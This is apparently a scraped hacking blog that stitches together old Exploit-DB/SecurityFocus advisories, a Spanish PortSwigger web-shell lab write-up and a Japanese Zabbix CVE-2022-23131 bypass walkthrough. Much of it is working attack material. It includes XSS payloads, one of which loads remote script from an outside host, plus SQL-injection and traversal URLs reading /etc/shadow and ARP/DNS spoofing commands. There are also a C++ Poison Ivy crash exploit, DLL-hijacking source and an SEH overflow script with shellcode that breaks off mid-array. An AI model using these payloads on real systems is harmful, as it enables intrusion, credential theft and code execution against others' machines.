Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863117623

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

source: https://www.securityfocus.com/bid/47957/info

Gadu-Gadu Instant Messenger is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 

file name that loads external x.js code:
<input
onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);"
autofocus>

example x.js code to hide, accept and open every file request:

document.getElementById('extra').innerHTML = '<style>.file,
.entrySeparator{display:none;}</style>';
n = document.getElementById('open_file');
n.setAttribute('id', '');

function ff(){
    if(f = document.getElementById('open_file')) {
        e = document.createEvent("HTMLEvents");
        e.initEvent('click', true, true);
        f.dispatchEvent(e);
        f.setAttribute('id', '');
    }
    setTimeout('ff()', 1000);
}

ff();
            
source: https://www.securityfocus.com/bid/47970/info

MidiCMS Website Builder is prone to a local file-include vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

MidiCMS Website Builder 2011 is vulnerable; other versions may also be affected. 

http://www.example.com/admin/jscripts/tiny_mce/plugins/ezfilemanager/index.php
http://www.example.com/?html=../../../../../../../../../../boot.ini%00 
            
source: https://www.securityfocus.com/bid/47971/info

The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_shop&task=viewproduct&editid=[SQLi] 
            
source: https://www.securityfocus.com/bid/47973/info

Kryn.cms is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Kryn.cms 0.9 is vulnerable; other versions may also be affected. 

http://www.example.com/kyrn/index.php?_kurl=%3Cscript%3Ealert%280%29%3C/script%3E 
            

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Remote Code Execution via Web Shell Upload”.

image 194

Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo.

En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo:

image 195
image 196

Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta:

image 197

Como podemos ver, tenemos una opción para subir archivo, y concretamente parece ser que se trata de actualizar el avatar del perfil. Vamos a intentar aprovecharnos de esta opción para subir el siguiente archivo PHP:

image 198
/home/carlos/secret
image 199
image 200

Una vez seleccionado, le damos a Upload, y se nos redireccionará a una página donde se nos dirá que el archivo ha sido subido correctamente:

image 201

Por lo que ahora, si nos fijamos en el perfil, podemos ver como el avatar ha cambiado, y ahora muestra un fallo de que no carga bien la imagen.

image 202

Dándole click derecho, podemos irnos a la ruta directa de la imagen para ver si se trata de nuestro archivo PHP:

image 203
image 204

Efectivamente, el archivo PHP que hemos subido se ha almacenado como el archivo del avatar, por eso no cargaba en el perfil, intentaba cargar una imagen cuando no lo era. Al visitar el archivo PHP, se ha interpretado el código que hemos colocado, y conseguimos leer el archivo secret.

Habiendo leído este archivo, ya simplemente entregamos la respuesta:

image 205
image 206

Y de esta forma, completamos el laboratorio:

image 207
image 208

source: https://www.securityfocus.com/bid/47975/info

Vordel Gateway is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.

Vordel Gateway 6.0.3 is vulnerable; other versions may also be affected. 

http://www.example.com:8090/manager/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow 
            
source: https://www.securityfocus.com/bid/47976/info

The RXS-3211 IP camera is prone to an information-disclosure vulnerability.

Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. 

the following proof of concept is available:

\xff\xff\xff\xff\xff\xff\x00\x06\xff\xf9 
            

0x00はじめに

最近、Zabbixの脆弱性(CVE-2022-23131)がそれを再現し、誤って外国企業のZabbixサーバーを取得しました。 Zabbix Sia Zabbixは、ラトビアのZabbix SIA(Zabbix SIA)のオープンソース監視システムです。このシステムは、ネットワーク監視、サーバー監視、クラウド監視、アプリケーション監視をサポートします。 Zabbix Frontendには、悪意のあるアクターがセッションに保存されているユーザーログインが検証されていないため、SAML SSO認証(非デフォルト)を有効にしてセッションデータを変更できるセキュリティの脆弱性があります。認可されていない悪意のある攻撃者は、この問題を活用してアクセス許可をエスカレートし、Zabbixのフロントエンドへの管理者アクセスを獲得する場合があります。

0x01脆弱性原因

SAML SSO Authentication Enabled(非デフォルト)を使用して、悪意のある攻撃者はセッションデータを変更して認証バイパスを実装できます。認可されていない悪意のある攻撃者は、この問題を活用してアクセス許可をエスカレートし、Zabbixのフロントエンドへの管理者アクセスを獲得する場合があります。

この脆弱性は、index_sso.phpファイルに存在します。 index_sso.phpファイルはcencryptedcookiesession3:checksign()メソッドを呼び出しておらず、クッキーを検証するため、クライアントのCookieを偽造できます。

index_sso.phpファイルから、forged cookieにsaml_dataが存在すると、username_attributeデータが取得されることがわかります。ユーザーが実際に存在する場合、セッションIDが生成され、アイデンティティ認証バイパスを実現します

0x02脆弱性の影響

5.4.8

5.0.18

4.0.36

0x03脆弱性の再発

FOFA:app='zabbix-supervision system' body='saml'execution curl -kssil http://xxx.com/

image-20220228135432625

セットクッキーの値を取得し、URLデコードを実行してから、base64デコード

URLデコード:

eyjzzxnzaw9uawqioiixnzfiodawoti4ndq2mmuxzgrhodayywfjodk5mdi2yyisinnpz24ioij0etzszvkzvddeyenjsef m2zlpyntrht3pcmhbhs25vwwhzdr3mhdkc2lwntj2audndulpqevjyquj5wdk5bghnmvvhbfm4ctrwnjbkb1wvugc9psj9

base64デコード:

{'SESSIONID':'171B8009284462E1DDA802AAC899026C'、 'SIGN':'TY6REY3T4QTGX zrlxs6fzr54aozb0paknoxpad4w0wjsip52viggw+crzjyrrabyx99lhm1ugls8q4p60jo \/pg=='}

image-20220228135629785

次に、文字列をスプライスします

{'saml_data': {' username_attribute':'admin '}、' sessionid':'171b8009284462e1dda802aac899026c '' '、 'sign':'ty6rey3t4qtgxzrlxs6fzr54aozb0paknoxpad4w0wjsip52vigggw+crzjyrrabyx999lhm1ugls8q4p60jo \/pg='}}}}}

スプライシング後、Base64暗号化が実行されます

image-20220228142358256

次に、urlencodeで

image-20220228142419540

image-20220228142545863

コマンドを実行

image-20220228142656315

管理- スクリプトを見つけて新しいスクリプトを作成します。ここで作成しましたifconfig

image-20220228143058058

image-20220228142800341

監視の最新のデータを見つけてから、実行するホストグループを除外し、ホスト名をクリックして対応するコマンドを実行します

image-20220228142957655

または、Github Exploitスクリプト:https://github.com/l0ading-x/cve-2022-23131https://github.com/mr-xn/cve-2022-23131スクリプトを実行します。1049983-20220303100933103-1583005440.jpg交換用クッキーのZBX_SESSION値はペイロードです。次に、シングルサインオン(SAML)1049983-20220303100933863-1203796296.jpgでサインインをクリックします。1049983-20220303100934820-1396911793.jpg

0x04修復方法

1。SAML認証を無効にします

2.セキュリティバージョンをアップグレードする(https://Support.zabbix.com/browse/zbx-20350)

source: https://www.securityfocus.com/bid/48008/info

Asterisk is prone to a user-enumeration weakness.

An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.

This issue affects Asterisk 1.8.4.1; other versions may also be affected. 


REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:500@192.168.2.1>
Refer-To: sip:500@192.168.2.1
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70
            
source: https://www.securityfocus.com/bid/48009/info

Blackboard Learn is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Blackboard Learn 8.0 is vulnerable; other versions may also be affected. 

http://www.example.com/bin/common/search.pl?action=RESULTS&amp;context=USERDIR&amp;type=SEARCH&amp;operation=VIEW&amp;keyword=abcd&amp;keywordraw=%22abcd%22/%3E%3Cscript+src%3Dhttp://www.example2.com/js/alert.js%3E%3C/script%3E%3Ca+href%3D%22test%22%3Ewhat%3C/a&amp;x=26&amp;y=15&amp;by=user_id 
            
source: https://www.securityfocus.com/bid/48028/info

Cotonti is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Cotonti 0.9.2 is vulnerable; other versions may also be affected. 

http://www.example.com/users.php?s=-2+AND+31337=0
http://www.example.com/forums.php?m=topics&s=offtopic&ord=-2+AND+31337=0 
            
source: https://www.securityfocus.com/bid/48029/info

NetVault: SmartDisk is prone to a remote denial-of-service vulnerability.

A successful exploit will cause the application to crash, effectively denying service.

NOTE: Remote code execution may be possible; however, this has not been confirmed.

NetVault: SmartDisk versions 1.2.2 and prior are affected.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35804.zip
            
source: https://www.securityfocus.com/bid/48030/info

Gadu-Gadu is prone to a remote code-execution vulnerability.

Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected application.

Gadu-Gadu 10.5 is affected; other versions may also be vulnerable. 

# echo 1 > /proc/sys/net/ipv4/ip_forward
# arp -s GW_IP GW_MAC
# arpspoof -i eth0 GW_IP
# echo "YOURIP *.adocean.pl" > /tmp/x
# dnsspoof -i eth0 -f /tmp/x
# while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection:
close\r\nContent-Length: 239\r\nContent-Type:
text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a
id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click',
true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done 
            
// source: https://www.securityfocus.com/bid/48039/info

Poison Ivy is prone to an unspecified buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Poison Ivy 2.3.2 is vulnerable; other versions may also be affected. 

# Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow
# Google Dork: No dorks.
# Date: 27/05/11
# Author: Kevin R.V <kevin.nullbyte@gmail.com>
# Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232
# Version: 2.3.2
# Tested on: Windows XP SP2
# CVE : No exist.
 
/*  Poison Ivy 2.3.2 Remote Buffer Overflow
 *  Author: Kevin R.V <kevin.nullbyte@gmail.com>
 *    Date: 2011
 * License: Totally free 8-)
 * */
 
#include <iostream>
#include <winsock2.h>
 
#define VERS "0.1"
 
int   connected;
using namespace std;
 
char payload[] = {
0xb2, 0xa8, 0xc3, 0x17, 0x1c, 0x1b, 0x99, 0xb9,
0x4c, 0xab, 0x8b, 0x88, 0x3a, 0x20, 0x13, 0xb3,
0x72, 0x0e, 0x57, 0xbc, 0x9f, 0x81, 0xb9, 0x08,
0x61, 0x30, 0x87, 0x74, 0xea, 0x65, 0xb5, 0x4a,
0xc9, 0xfc, 0x87, 0xe3, 0x95, 0x9e, 0xcd, 0xcd,
0x40, 0x98, 0xd2, 0x1f, 0x31, 0xee, 0x96, 0x83,
0x3d, 0x0a, 0xfe, 0xb8, 0x9b, 0xf2, 0xe7, 0x10,
0x23, 0x64, 0xfe, 0xe9, 0x10, 0xc4, 0x9c, 0xf7,
0x29, 0xe5, 0x6b, 0xe3, 0x54, 0xbb, 0x18, 0x8b,
0x07, 0x81, 0x92, 0x5e, 0xbb, 0x35, 0x6f, 0xe4,
0x23, 0x4a, 0x0c, 0xd0, 0x1f, 0x3b, 0xd4, 0x9a,
0x5c, 0x94, 0xad, 0x8b, 0xed, 0xa4, 0xed, 0xb2,
0x14, 0x23, 0x04, 0xa5, 0xfd, 0x8e, 0x8c, 0x9b,
0xc8, 0x0f, 0x78, 0xbf, 0xf2, 0xe4, 0xfe, 0x28,
0xe9, 0x3c, 0x5d, 0x86, 0x16, 0xff, 0x59, 0x7d,
0x70, 0x6d, 0x18, 0x2d, 0xdf, 0x28, 0x66, 0x02,
0xde, 0xca, 0x20, 0xe6, 0xfd, 0xe7, 0xbf, 0x4d,
0xe8, 0x8c, 0x69, 0xdd, 0x40, 0x22, 0x8f, 0x2f,
0x55, 0x54, 0xb1, 0x60, 0x86, 0x29, 0xd0, 0x3d,
0xc7, 0x01, 0xb5, 0xdc, 0xbf, 0x63, 0x28, 0xd2,
0x4e, 0xe6, 0x29, 0xed, 0x5c, 0xee, 0x17, 0x53,
0xe1, 0x11, 0x5c, 0x61, 0x9b, 0xb0, 0xfc, 0x71,
0x6e, 0x46, 0xa9, 0x27, 0xa8, 0x21, 0x05, 0x67,
0x86, 0x24, 0x86, 0x01, 0xb8, 0xd7, 0x65, 0x11,
0x36, 0xe5, 0x16, 0x05, 0xdc, 0x8c, 0x7c, 0xa7,
0xb9, 0xee, 0xbe, 0xa6, 0xcf, 0x88, 0x67, 0x56,
0xaa, 0x61, 0xe3, 0x2c, 0x72, 0xbf, 0x5b, 0xee,
0x18, 0xc4, 0x65, 0x2c, 0x4a, 0x0d, 0x88, 0x2e,
0xad, 0x96, 0x67, 0xab, 0xc1, 0xb1, 0x95, 0x03,
0x36, 0xc8, 0x04, 0xbf, 0xe8, 0x29, 0x5a, 0xf5,
0x83, 0xe5, 0x5f, 0xe4, 0x0e, 0xe2, 0x6f, 0x6b,
0x93, 0x80, 0xe7, 0x25, 0xca, 0x44, 0xa8, 0x48 };
 
 
char payload2[] = {
0xc6, 0xa7, 0x53, 0xce, 0xdc, 0x1c, 0xdc, 0x74,
0x9a, 0xc7, 0x31, 0xdf, 0x2a, 0x21, 0x5f, 0x0e,
0x7e, 0xe6, 0x1e, 0xa1, 0xb5, 0x17, 0xc4, 0x9f,
0x4a, 0x7a, 0x81, 0xde, 0x90, 0x13, 0x37, 0x2d,
0x62, 0x3c, 0xb6, 0x10, 0x2d, 0x44, 0x57, 0xa2,
0xa0, 0xdd, 0xcb, 0x90, 0xd3, 0x83, 0x1a, 0xda,
0x89, 0x97, 0x68, 0x61, 0xce, 0x38, 0xc1, 0xc4,
0xe8, 0xb0, 0xfa, 0x0b, 0x64, 0x12, 0x73, 0xf0,
0x28, 0x24, 0x2b, 0x51, 0x78, 0x15, 0xfa, 0x27,
0xcc, 0xc7, 0x5c, 0x5c, 0x3a, 0xf8, 0xea, 0x5e,
0xd9, 0x6e, 0xd4, 0x96, 0xa0, 0x8d, 0x99, 0x13,
0x84, 0x99, 0xff, 0xba, 0x41, 0xed, 0xf3, 0x1c,
0x67, 0xb6, 0xaa, 0x5a, 0x95, 0xfd, 0x92, 0x23,
0x9a, 0x72, 0x86, 0xcd, 0xf6, 0xa1, 0xb9, 0x44,
0xbc, 0x15, 0xc3, 0xac, 0xaa, 0xd6, 0x65, 0xf1,
0x08, 0x19, 0xf5, 0x2a, 0x62, 0xe4, 0x0d, 0x4e,
0x14, 0x1f, 0x21, 0x4d, 0x0c, 0x22, 0x06, 0x98,
0x84, 0x74, 0xf7, 0xaa, 0x18, 0x90, 0xd7, 0xe5,
0x2d, 0x04, 0x45, 0xb4, 0x2f, 0xbc, 0xdc, 0x97,
0xd2, 0x9b, 0x25, 0xe5, 0x4d, 0xb3, 0x51, 0x5f,
0x1a, 0x93, 0xe4, 0x97, 0x51, 0xc7, 0xd9, 0x81,
0x52, 0xee, 0x11, 0x83, 0x51, 0xb1, 0xd5, 0x34,
0x6f, 0xf1, 0xea, 0x9e, 0xbf, 0x4b, 0x6e, 0x33,
0x0d, 0x8a, 0x73, 0x15, 0xb9, 0xde, 0x92, 0x53,
0xd3, 0xfd, 0x5a, 0xcf, 0x69, 0xde, 0x19, 0x29,
0x05, 0xa1, 0x50, 0x78, 0x14, 0x81, 0xe5, 0xf1,
0x74, 0xea, 0x8c, 0x82, 0x58, 0x93, 0x74, 0x4f,
0x5a, 0x77, 0xb5, 0xde, 0x17, 0xd1, 0x48, 0x44,
0x1b, 0x1f, 0x32, 0x30, 0x9f, 0x64, 0x7c, 0x22,
0x4e, 0xd4, 0x1a, 0xae, 0x77, 0x01, 0x2b, 0x1f };
 
 
char payload3[] = {
0xe0, 0xf5, 0x3d, 0xc1, 0xf0, 0xea, 0x15, 0xdb,
0x43, 0x3e, 0x65, 0xf8, 0x9b, 0xe2, 0x14, 0xba,
0x90, 0x48, 0x5c, 0xd5, 0xec, 0x70, 0xa3, 0x8b,
0x41, 0x72, 0x28, 0x50, 0xec, 0xf6, 0xd5, 0x2a,
0xe6, 0x06, 0x46, 0xb2, 0xc5, 0x0c, 0x96, 0x6a,
0x69, 0x86, 0x6b, 0x12, 0xe4, 0x93, 0xe5, 0x11 };
     
 
 
int PoC(char * host, unsigned int port)
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,0),&wsa);
    SOCKET sock;
    struct sockaddr_in  local;
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    local.sin_family = AF_INET;
    local.sin_addr.s_addr = inet_addr(host);
    local.sin_port = htons(port);
    if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
    {
            connected = 1;
            cout << ".";
            for(long int i = 0; i<99; i++)
            {
                sendto(sock, payload, sizeof(payload), 0, (struct sockaddr *)&local,sizeof(local));
                sendto(sock, payload2, sizeof(payload2), 0, (struct sockaddr *)&local,sizeof(local));
                sendto(sock, payload3, sizeof(payload3), 0, (struct sockaddr *)&local,sizeof(local));
            }
             
            PoC(host, port);
    }
     
    else
    {
        if ( connected )
        cout << endl << endl << "[+] Congrats, poison-ivy crashed!!" << endl;
        else
        cout << endl << endl << "[-] Sorry not poison ivy detected 8-(" << endl;
    }
}
int main(int argc, char *argv[])
 
{
    cout << "Poison-ivy remote buffer overflow " VERS << endl << endl;
    cout << "by Kevin R.V <kevin.nullbyte@gmail.com" << endl;
    if ( argc < 2 )
    {
        cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
        exit(-1);
    }
     
    u_short port;
    char * ip;
     
    for(int i = 0; i<argc; i++)
    {
        if( ! strcmp(argv[i], "-h") != 0 )
        ip = argv[i+1];
        else if( ! strcmp(argv[i], "-p") != 0 )
        port = atoi(argv[i+1]);
    }
     
    cout << "[+] Starting exploit" << endl << endl;
    PoC(ip, port);
     
     
    return 1;
}
            
source: https://www.securityfocus.com/bid/48051/info

Kentico CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Kentico CMS 5.5R2.23 is vulnerable; other versions may also be affected. 

POST http://localhost/examples/webparts/membership/users-viewer.aspx HTTP/1.1
&userContextMenu_parameter=%22%20onmouseover%3Dalert%281%29%20zsl%3D%22
            
source: https://www.securityfocus.com/bid/48054/info

Serendipity Freetag-plugin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue affects Serendipity Freetag-plugin 3.21; prior versions may also be affected. 

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>

http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>

http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))> 
            
// source: https://www.securityfocus.com/bid/48055/info

Microsoft Windows Live Messenger is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file. 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1               #########################################              1
0               I'm kalashinkov3 member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#########################################################
# Title : Msn Live Messenger14.0=>Plus! DLL Hijacking Exploit (dwmapi.dll)
# Author: Kalashinkov3
# Home : 13000/ ALGERIA
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 31/05/2011
# Category  : Local Exploit
# Tested on: [Windows Xp Sp3 Fr]       
#########################################################  

# File Vulnerable: 
- msnmsgr.exe


# Vulnerable extensions:

- .plsk

" Vulnerable Dll's:

dwmapi.dll 

./

#include <windows.h>
#define DLLIMPORT _declspec (dllexport)
                                                                                                                                                                                   
DLLIMPORT void DwmDefWindowProc() { evil(); }                                                                                                                                                                               
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }                                                                                                                                                                      
DLLIMPORT void DwmEnableComposition() { evil(); }                                                                                                                                                                           
DLLIMPORT void DwmEnableMMCSS() { evil(); }                                                                                                                                                                                 
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }                                                                                                                                                                   
DLLIMPORT void DwmGetColorizationColor() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }                                                                                                                                                                    
DLLIMPORT void DwmGetWindowAttribute() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }                                                                                                                                                               
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }                                                                                                                                                                    
DLLIMPORT void DwmRegisterThumbnail() { evil(); }                                                                                                                                                                           
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmSetPresentParameters() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmSetWindowAttribute() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }                                                                                                                                                                         
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}


^_^ GOOD LUCK ALL :) 

+ Greets To==================================================================+
                                                                             + 
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com       +
andhrahackers.com, all Algerians Hacker'S ;) & 1337day.com/team              +
                    # All My Friends #                                       +
=============================================================================+
            
source: https://www.securityfocus.com/bid/48056/info

The 'libxml2' library is prone to multiple memory-corruption vulnerabilities, including one that can trigger a heap-based buffer-overflow error and an integer-overflow condition.



An attacker can exploit these issues by enticing an unsuspecting user into opening a specially crafted XML file that contains a malicious XPath.



A successful attack can allow attacker-supplied code to run in the context of the application using the vulnerable library or can cause a denial-of-service condition.


//@*/preceding::node()/ancestor::node()/ancestor::foo['foo'] 
            
## Source: https://code.google.com/p/google-security-research/issues/detail?id=123

Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

When a user logs into a computer the User Profile Service is used to create certain directories and mount the user hives (as a normal user account cannot do so). In theory the only thing which needs to be done under a privileged account (other than loading the hives) is creating the base profile directory. This should be secure because c:\users requires administrator privileges to create. The configuration of the profile location is in HKLM so that can’t be influenced. 

However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user’s token, but this changes to impersonating Local System part of the way through. Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs everytime the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile. 

Some identified issues are:

* When creating directories the service does a recursive create, so for example if creating c:\users\user it will first create c:\users then c:\users\user. Probably not exploitable because Users already exists but of course worth remembering that normal users can create directories in the c: drive root. So always a possibility being able to place a junction point at c:\users on some systems.

* The service creates the temporary folder for the user in CreateTempDirectoryForUser and gets the value from the user’s hive Environment key (TEMP and TMP). This folder is created under system privileges. All it requires is the string starts with %USERPROFILE% so you can do relative paths or just replace USERPROFILE in the environment. This probably isn't that useful on the whole as the security of the directory is inherited from the parent.

* Creation of AppData\LocalLow folder in EnsurePreCreateKnownFolders. This might be exploited to set an arbitrary directory’s integrity level to Low as it tries to set the label explicitly. But that’s probably only of interest if there’s a directory which a normal user would be able to write to but is blocked by a high/system integrity level which is unlikely. 

* Probably most serious is the handling of the %USERPROFILE\AppData\Local\Microsoft\Windows\UsrClass.dat registry hive. The profile service queries for the location of AppData\Local from the user’s registry hive then tries to create the Windows folder and UsrClass.dat file. By creating a new folder structure, changing the user's  shell folders registry key and placing a junction in the hierarchy you can get this process to open any other UsrClass.dat file on the system, assuming it isn't already loaded. 

For example you could create a directory hierarchy like:
%USERPROFILE%\AppData\NotLocal\Microsoft\Windows -> c:\users\administrator\appdata\local\Microsoft\windows

Then set HKCU\Software\Microsoft\Windows\Explorer\User Shell Folders\Local AppData to %USERPROFILE%\AppData\NotLocal.

It seems to even set the root key security when it does so, this might be useful for privilege escalation. This has a chicken-and-egg problem in that the NtLoadKey system call will create the file if it doesn't exist (it sets the FILE_OPEN_IF disposition flag), but you must be running as an administrator  otherwise the privilege check for SeRestorePrivilege will fail.

I've looked at the implementation on Windows 7 and there are a few similar issues but Windows 8.1 implementation of the services does a lot more things. At least the most serious UsrClass.dat issue exists in 7. 

Attached is a batch file PoC for Windows 8.1 Update which demonstrates the temporary folder issue. To verify perform the following steps:
1) Execute the batch file as a normal user (this was tested with a local account, not a Microsoft online linked account, or domain). This will change the environment variables TEMP and TMP to be %USERPROFILE%\..\..\..\..\Windows\faketemp
2) Logout then log back in again
3) Observe that the directory \Windows\faketemp has been created.





reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp
reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp
            
#!/usr/bin/python
# coding: utf-8
#Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow 
#Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06)
#Software for usb Wireless:T-Mobile web'n'walk Stick Fusion
#Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#Software Link:https://www.t-mobile.de/downloads/neu/winui.zip
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
#Video poc:http://bit.ly/17DhwSR
print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
from struct import pack
junk="\x41" * 18073
nseh="\xeb\x06\x90\x90" 
seh=pack('<I',0x6900CEAE)#6900CEAE 5F  POP EDI intl.dll
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
